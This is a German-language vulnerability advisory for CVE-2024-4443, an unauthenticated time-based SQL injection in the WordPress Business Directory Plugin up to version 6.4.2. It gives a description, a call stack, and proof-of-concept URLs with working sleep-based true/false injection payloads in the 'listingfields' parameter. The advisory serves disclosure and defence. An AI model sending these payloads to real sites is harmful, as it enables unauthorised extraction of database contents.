
CVE-2024-4443 Business Directory Plugin – Einfache Auflistungsverzeichnisse für WordPress <= 6.4.2 - Unauthentifizierte SQL-Injection über den listingfields-Parameter
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Nicht authentifizierte SQL-Injection über den Parameter listingfields
Beschreibung
Das Business Directory Plugin – Easy Listing Directories for WordPress für WordPress ist anfällig für zeitbasierte SQL-Injection über den Parameter 'listingfields' in allen Versionen bis einschließlich 6.4.2 aufgrund unzureichenden Escapings des vom Benutzer bereitgestellten Parameters und mangelnder ausreichender Vorbereitung der vorhandenen SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen an bereits bestehende Abfragen anzuhängen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.
Aufrufstapel
WPBDP__Listing_Search->execute (\business-directory-plugin\includes\helpers\class-listing-search.php:88)
WPBDP__Listing_Search->_traverse_tree (\business-directory-plugin\includes\helpers\class-listing-search.php:185)
WPBDP__Listing_Search->__construct (\business-directory-plugin\includes\helpers\class-listing-search.php:35)
WPBDP__Listing_Search::parse_request (\business-directory-plugin\includes\helpers\class-listing-search.php:214)
WPBDP__Listing_Search::from_request (\business-directory-plugin\includes\helpers\class-listing-search.php:210)
WPBDP__Views__Search->dispatch (\business-directory-plugin\includes\controllers\pages\class-search.php:54)
Poc
URL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[{{Injection payload}}][1]=
Normale URL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[1]=

URL für falsches Payload: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=0,5,0))+))--+-][1]=

URL für wahres Payload: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]=
